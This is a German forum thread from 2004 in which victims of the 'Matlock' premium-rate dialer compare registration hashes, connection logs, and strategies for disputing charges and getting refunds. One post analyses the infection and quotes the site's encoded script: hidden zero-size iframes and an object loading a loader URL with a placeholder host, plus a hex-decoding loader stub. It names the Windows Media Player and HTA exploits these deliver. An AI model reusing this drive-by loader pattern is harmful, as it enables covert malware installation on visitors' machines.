090090000263 oder auch Matlock - ermitteln Sie (Teil 1)

[hrachka]

good news everyone!

ich habe "mein" web.exe mit dem Hash-Programm ermittelt und herausgestellt, dass beide Hashwerte, der meines WEB.EXE und, der aus der datenbank der RegTP NICHT identisch sind,obwohl die angezeigte Version von meinem WEB.EXE mit der von der Datenbank übereinstimmte. Hashversion vom WEB.EXE gelang mir nicht rauszufinden, denn es immer ein Fehler gemeldet wurde.

 

[Anonymous]

Re: exdialer

Meine Frage lautet:
wo kann ich nachschauen, wie lange das gedauert hat. Gibt es da eine Logdatei in windows xp?
Das tatsächliche Ausmaß kann ich nicht beurteilen, aber die Frage ist, wieviel könnten diese 10sekunden oder 15 sekunden gekostet haben.
mfg profiler

Unter "Arbeitsplatz / Verwalten / Ereignisanzeige / System" stehen die normalen RAS-Verbindungen mit Anfang- und Endzeit drin.
Abzocker-Dialer kassieren im Blocktarif: EUR 29,99 für 20 oder 30 Minuten.

Arbeitsplatz / Systemsteuerung / Verwaltung / Ereignisanzeige / System ???

 

[Anonymous]

noch mehr betroffene

bei uns in der wg hat sich das Ding auch eingewählt, am 5.2.
Wer also gerade am zählen der Beschwerdebriefe ist, kann unseren dazunehmen.
Unser Problem: Wir haben das erste heute bemerkt, und den Rechnugsbetrag schön längst komplett überwiesen. Ist da noch was zu machen?

 

[virenscanner]

...und den Rechnugsbetrag schön längst komplett überwiesen.

Selbst überwiesen (Überweisungsformular) oder wurde abgebucht (Einzugsermächtigung)?

 

[hrachka]

Re: noch mehr betroffene

bei uns in der wg hat sich das Ding auch eingewählt, am 5.2.
Wer also gerade am zählen der Beschwerdebriefe ist, kann unseren dazunehmen.
Unser Problem: Wir haben das erste heute bemerkt, und den Rechnugsbetrag schön längst komplett überwiesen. Ist da noch was zu machen?

bei der CITIBANK wo mein Nest ist, kann ich binnen 14 tage jede Überweisung stornieren. Tut es bei Euch dasselbe. Wird`s funktionieren.

 

[hrachka]

:evil:

also folgendes:


Nach weiteren ntersuchungen in der Datenbank von RegTP habe ich folgendes festgestellt:

bei mir:
web.exe - last modified at 26.01.2004 - angezeigte Version - 2.0.0.3, Hashwert - ERROR
Hashwert vom HashAnzeige.exe: 75895E830E5C6E63A7643EF10149C5B756A81864

:x bei der RegTP:
Reg.-Nr.: 90090000263-756024 vom : Dec 17 2003 1:33PM
Hash - Wert :cdc2d7874acc35b37ac7a1eb3cc31ff6
Dateiname : Dialer_090090000263.exe
Dialer - Version : 2.0.0.3
Inhalteanbieter : Matlock Business Corp. Jasmine Court, 35A Regent Street, P.O. Box 1777, Belize City, Belize

bei der RegTP:
Reg.-Nr.: 90090000263-1263827 vom : Feb 4 2004 9:50AM
Hash - Wert :75895E830E5C6E63A7643EF10149C5B756A81864
Dateiname : Dialer_090090000263.exe
Dialer - Version : 3.0.0.3
Inhalteanbieter : Matlock Business Corp. Jasmine Court, 35A Regent Street, P.O. Box 1777, Belize City, Belize

Wie man sieht, Versionnummer mit entsprechendem Hashwert entsprechen der Wirklichkeit bei mir NICHT. Noch kommischer, dass die Version 3.0.0.3 ist am 04. Februar registriert und bei mir am Rechner ist schon am 26.01.2004. Na also........bin etwas dämmlich um das Fazit allein zu ziehen. Helft mir!

 

[Anonymous]

bei mir:
web.exe - last modified at 26.01.2004 - angezeigte Version - 2.0.0.3, Hashwert - ERROR
Hashwert vom HashAnzeige.exe: 75895E830E5C6E63A7643EF10149C5B756A81864

:x bei der RegTP:
Reg.-Nr.: 90090000263-756024 vom : Dec 17 2003 1:33PM
Hash - Wert :cdc2d7874acc35b37ac7a1eb3cc31ff6
Dateiname : Dialer_090090000263.exe
Dialer - Version : 2.0.0.3
Inhalteanbieter : Matlock Business Corp. Jasmine Court, 35A Regent Street, P.O. Box 1777, Belize City, Belize

irgendwo habe ich gelesen, dass schon die Änderung eines Wortes oder so in der Datei den hashwert ändert. Das würde einiges erklären, bleibt die Frage, wie die RegTP ihre Verfügungen auslegt.

Streng genommen ist das ein Verstoß gegen diese Verfügung, die das mit dem Hashwert regelt. Oder?

cj

 

[eb-victim]

Re: exdialer

Arbeitsplatz / Systemsteuerung / Verwaltung / Ereignisanzeige / System ???

Mein Fehler: "Arbeitsplatz", dann rechte Maustaste und "Verwalten", dann Ereignisanzeige und System öffnen.
Sollte bei Windows 2000 und Windows XP funktionieren.
Da ich ein englisches Windows einsetze, stimmen evtl. nicht alle Bezeichnungen haargenau überein.

 

[hrachka]

irgendwo habe ich gelesen, dass schon die Änderung eines Wortes oder so in der Datei den hashwert ändert. Das würde einiges erklären, bleibt die Frage, wie die RegTP ihre Verfügungen auslegt.

Streng genommen ist das ein Verstoß gegen diese Verfügung, die das mit dem Hashwert regelt. Oder?

cj

nein, ich habe durch RENAME auch andere Möglichkeiten ausprobiert. Der Hashwert hängt NICHT vom Dateinamen ab. Tatsache!

 

[virenscanner]

eines Wortes oder so in der Datei

Damit ist nicht der Name der Datei gemeint.

 

[TSCoreNinja]

Sammlung Exploits

Hi All,
Wie kommt meine Web.exe auf meinen Rechner? Eine Frage, die hier vermutlich viele wissen wollen.

Hab die Antwort gerade frisch aus dem Web gezogen. Wenn ich Eingang anklicke, kommt folgendes auf meinen Rechner:

<SCRIPT LANGUAGE="JScript.Encode">document.write(' <IFRAME SRC="$BÖSEURL/loader/get.html?id=4&sess_id=sNJcXm" WIDTH=0 HEIGHT=0></
IFRAME>');
</SCRIPT><SCRIPT LANGUAGE="JScript.Encode">document.write(' <IFRAME SR
C="$BÖSEURL/loader/get.html?id=1&sess_id=sNJcXm" WIDTH=0 HE
IGHT=0></IFRAME>');
</SCRIPT><SCRIPT LANGUAGE="JScript.Encode">document.write('<OBJECT DAT
A="$BÖSEURL/loader/get.html?id=6&sess_id=sNJcXm" WIDTH=0 HE
IGHT=0>')

Drei Dateien, die drei Exploits enthalten. Nachdem ich meinen Browser (Konqueror/Linux) fleissig das Session-Cookie habe liefern lassen (?), hat mir der Webserver auch brav die Dateien geliefert.

BTW, gethtml?id=2 und 3 liefern die fuer den 1. Exploit noetigen Daten, andere ids gibts nicht (bis 20 getestet).

get.html?id=1 ist der bereits diskutierte Windows Media Player Exploit, der den Player überschreibt/den Dialer darin einparkt.

get.html?id=4 sieht wie folgt aus:

<SCRIPT LANGUAGE="JScript.Encode">var z="<Langer String>";
var s;
s="";
for (f=0;f<z.length;f+=2)
{
    s+=String.fromCharCode("0x"+z.charAt(f)+z.charAt(f+1));
}
document.write(s);
</SCRIPT>

get.html?id=6 ist ein mir wohlbekannter HTA Exploit
Weiss jemand der Komplettheit halber, was Exploit 4 tut? Ansonsten werde ich mal den Dialer auspacken, wenn ich Langeweile habe, weiss noch nicht, welche Nummer der anwaehlt.
Gruesse,
TSCoreNinja

 

[TSCoreNinja]

BTW, @ alle Matlock Opfer.

Nachdem Ihr vermutlich alle Zeit und Geld in die Verteidigung gegen die durch die rosa Riesen eingetriebenen Forderungen von Matlock geopfert habt, hier eine Moeglichkeit, zumindest etwas des finanziellen Verlusts zu kompensieren, wenn Ihr eine Homepage habt. Siehe http://traf-shop.com/

Wer nicht versteht, was dass mit Matlock zu tun hat, schaue sich mal den Whois Eintrag ein

 

[hrachka]

BTW, @ alle Matlock Opfer.

Nachdem Ihr vermutlich alle Zeit und Geld in die Verteidigung gegen die durch die rosa Riesen eingetriebenen Forderungen von Matlock geopfert habt, hier eine Moeglichkeit, zumindest etwas des finanziellen Verlusts zu kompensieren, wenn Ihr eine Homepage habt. Siehe http://traf-shop.com/

Wer nicht versteht, was dass mit Matlock zu tun hat, schaue sich mal den Whois Eintrag ein

blödsinn

mit einem PopUpStopper kriege ich sowoeso nichts vor den Augen. Dann rentiert sich auch nicht für derjenigen der das geld zahlt.

 

[Lyska]

Erlebnisbericht

hab in den letzten Tagen hier fleissig gelesen und will jetzt auch mal meinen Erlebnisbericht zum besten geben..
passiert is das ganze am 31.01.2004.. Dialer hat sich selbstständig runtergeladen, eingewählt, gelöscht... das übliche eben...
als dann die Rechnung ins Haus flatterte bekam ich nen Schlag.. 29,95€ für 6 sekunden...
hab natürlich sofort bei den Telekomfritzen angerufen, mir erstmal erklären lassen was dieses PRS sein soll, meine Einzugsermächtigung widerrufen damit die das Geld nich bekommen und die Nummerngasse sperren lassen...

zum Glück hat die DTAG mir immer nen EVN mitgeschickt seit ich nicht mehr bei Rechnung Online bin..
so konnte ich wenigstens gleich mit der Recherche über 0900..425 beginnen und sties auf allseits bekannte Easybilling bzw Matlock

ein Blick in die RegTP ergab Hashwert und Versionsnummer stimmen natürlich nicht überein

Widerspruch wurde sofort abgeschickt (Einschreiben mit rückschein) mal sehen was dabei herauskommt..

wollte dann ne Woche später den Restbetrag überweisen und was stelle ich fest? die I[...] haben trotz allem meine Rechnung komplett abgebucht...
wieder ein wütender Anruf bei den Telekomikern.. die nette Frau erklärte mir, dass sie das Geld nicht zurück überweisen kann, da sie auch schon den strittigen Betrag an Easybilling weitergeleitet habe ... ich solle abwarten und vielleicht ne Woche später nochmal nachfragen... auf die Frage, ob ich das Geld über meine Bank zurückholen kann, bekam ich nur zu hören, dass ich das nicht machen solle wegen entstehender Stornogebühren..
das sie das gar nicht abbuchen durften weil keine Einzugsermächtigung vorlag, hat die gar nicht interessiert..
Frechheit is das..
konnte zum Glück alles über meine Bank zurückbuchen...
hab denen von der Telekom auch gleich noch nen netten Brief geschrieben und bin jetzt gespannt ob ich wenigstens ne Entschuldigung dafür bekomm und ob ich die Stornogebühren zahlen muss

ich freu mich schon richtig auf die Antwort von denen... die sollen sich mal mit mir anlegen.. bin ja nicht umsonst rechtschutzversichert *g*

werd mich auch nochn bissl mit den techn. Einzelheiten/ Funktionsweise beschäftigen.. wenn was neues rauskommt werdet ihr es erfahren

Liebe Grüße
Lys

edit: Heiko

 

[Anonymous]

So sehr ich deinen Ärger verstehe, solltest Du die Beleidigungen in deinem Beitrag löschen.

 

[TSCoreNinja]

blödsinn

mit einem PopUpStopper kriege ich sowoeso nichts vor den Augen. Dann rentiert sich auch nicht für derjenigen der das geld zahlt.

Naja, für Matlock fällt scheinbar trotzdem die eine oder andere Einwahl ab. Oder glaubst Du, dass die das aus Grossherzigkeit machen, dass muss sich wirtschaftlich rechnen.
TSCN

 

[eb-victim]

Alle (?) Matlock-Dialer gefunden!!!

Hi, Folks!
Ich gehe mal davon aus, dass ich jetzt alle Matlock-Dialer für die Nummern 090090000421-470 sowie 090090000261-270 zusammen habe.

Zumindest für die Nummer 090090000426 gilt: der Dialer vom 17.12.03 und der Dialer vom 04.02.04 sind identisch!!!
Bei der Reg. vom 17.12. wurde der MD5-Hashwert (128 bit) angegeben.
Bei der Reg. vom 04.02. wurde der richtige 160-bit-Hashwert angegeben - aber leider mit einer falschen Versionsnummer!

Warum bin ich nicht früher dahintergekommen???

Dies gilt vermutlich für die anderen Nummern genauso.

Alle 60 Dialer haben identischen Programmcode und unterscheiden sich nur durch die angehängten Ressourcen, in denen die Nummer und der Preis enthalten ist.
Ergo: ist einer illegal, sind alle illegal!
Und wenn die Dinger legal sind, taugt das ganze Gesetz nix!!!

 

[Anonymous]

Hallo KollegInnen

Ich bin im Februar auch zum ersten Mal Opfer eines 09009000261 Dialers geworden, nachdem ich schon seit 2000 im Internet surfe:

25,83 Euro für 6 (!!!) Sekunden.

Habe das ganze erst auf der Abrechnung bemerkt. Bewußt habe ich bestimmt nichts runtergeladen.

Ich habe sofort schriftlichen Einspruch und Beschwerde bei der Telekom eingelegt und meinen Anschluss für alle 0900 und 0190 Nummer sperren lassen. Das kosten 7,50 Euro.

Eigentlich ist das eine Frechheit. Wenn die Dialer Technologie so unsicher ist, sollte man es doch eher so handhaben, dass der Kunde seinen Anschluß explizit für einen speziellen Dialer freischalten lassen muss, wenn er wirklich solche "Leistungen" in Anspruch nehmen will.

Mir ist bis heute nicht klar, welche Leistungen sich hinter dieser Nummer, die der Easybilling AG gehört, verbergen.

Den Betrag für den Dialer habe ich nicht überwiesen. Jetzt kam eine Mahnung der Telekom und eine Abweisung meiner Beschwerde, mit dem Hinweis, dass es sich um einen bei der REGTP registrierten Dialer handele.

Ich bin aber fest entschlossen, eine solche kriminelle Geldmache nicht zu unterstützen und diesen Betrag nicht zu überweisen. Für Hinweise dazu, wie ich auf meinem Computer Beweise für die Existenz eines solchen kriminellen Dialerprogramms sichern kann, bin ich dankbar.

Viele Grüße, Michael

 

[blumenwiese23]

Re: exdialer

Meine Frage lautet:
wo kann ich nachschauen, wie lange das gedauert hat. Gibt es da eine Logdatei in windows xp?
Das tatsächliche Ausmaß kann ich nicht beurteilen, aber die Frage ist, wieviel könnten diese 10sekunden oder 15 sekunden gekostet haben.
mfg profiler

Unter "Arbeitsplatz / Verwalten / Ereignisanzeige / System" stehen die normalen RAS-Verbindungen mit Anfang- und Endzeit drin.
Abzocker-Dialer kassieren im Blocktarif: EUR 29,99 für 20 oder 30 Minuten.

Korrektur: Arbeitsplatz, dann rechte Maustaste, dann Verwalten, dann Ereignisanzeige und dann System. (Ich hoffe, die Bezeichnungen sind korrekt (mein Windows redet englisch).)

da hab ich auch gerade nachgeschaut. leider startet das protokoll erst ein paar tage nach meinen einwahlen.
ich kann doch mit xp verschiedene datum wiederherstellen. könnte das klappen.
leider hab ich, als ich noch analog im netz war alle paar wochen mit dem steganos internet anonym meine platte aufgeräumt...

 

[haudraufundschluss]

http://forum.computerbetrug.de/viewtopic.php?p=44422#44422